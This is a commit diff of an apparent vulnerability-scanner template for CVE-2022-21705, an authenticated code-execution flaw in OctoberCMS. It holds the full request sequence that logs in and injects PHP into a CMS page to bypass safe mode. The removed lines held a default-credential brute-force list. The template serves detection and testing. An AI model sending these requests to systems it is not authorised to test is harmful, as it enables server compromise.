Update CVE-2022-21705.yaml

patch-1
Prince Chaddha 2022-05-17 16:48:10 +05:30 committed by GitHub
parent 16f5e02fc9
commit 39861301d2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 27 deletions

View File

@ -4,11 +4,10 @@ info:
name: OctoberCMS Authenticated Remote Code Execution
author: iPhantasmic
severity: high
description: Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework.
In affected versions user input was not properly sanitized before rendering.
An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code.
This issue only affects admin panels that rely on safe mode and restricted permissions.
To exploit this vulnerability, an attacker must first have access to the backend area.
description: |
Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area.
remediation: |
The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually.
reference:
- https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe
- https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22
@ -18,7 +17,6 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-21705
cwe-id: CWE-74
remediation: The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually.
tags: cve,cve2022,authenticated,rce,cms,octobercms,injection
@ -33,7 +31,7 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_session_key={{session_key}}&_token={{token}}&postback=1&login={{user}}&password={{password}}
_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}
- | # to inject php code in Markup editor and perform exploit
POST /backend/cms HTTP/1.1
@ -43,7 +41,7 @@ requests:
X-OCTOBER-REQUEST-PARTIALS:
X-Requested-With: XMLHttpRequest
_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D=test&settings%5Burl%5D=%2Ftest&fileName=test&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0AVulnerable.&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0
_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0
- | # to obtain theme
POST /backend/cms HTTP/1.1
@ -63,7 +61,7 @@ requests:
X-OCTOBER-REQUEST-PARTIALS:
X-Requested-With: XMLHttpRequest
_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path=test.htm
_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm
cookie-reuse: true
@ -93,30 +91,17 @@ requests:
internal: true
# Obtain current theme used for Markup editor of OctoberCMS
# authenticate with default and common OctoberCMS credentials
attack: clusterbomb
payloads:
user:
- admin
- root
- user
password:
- admin
- root
- password
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'function onInit()'
- 'phpinfo()'
- 'Vulnerable.'
- 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.'
condition: and
# if exploit executes, phpinfo() should now be exposed at the /test endpoint, even though Safe mode is enabled
# if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled
- type: status
status:
- 200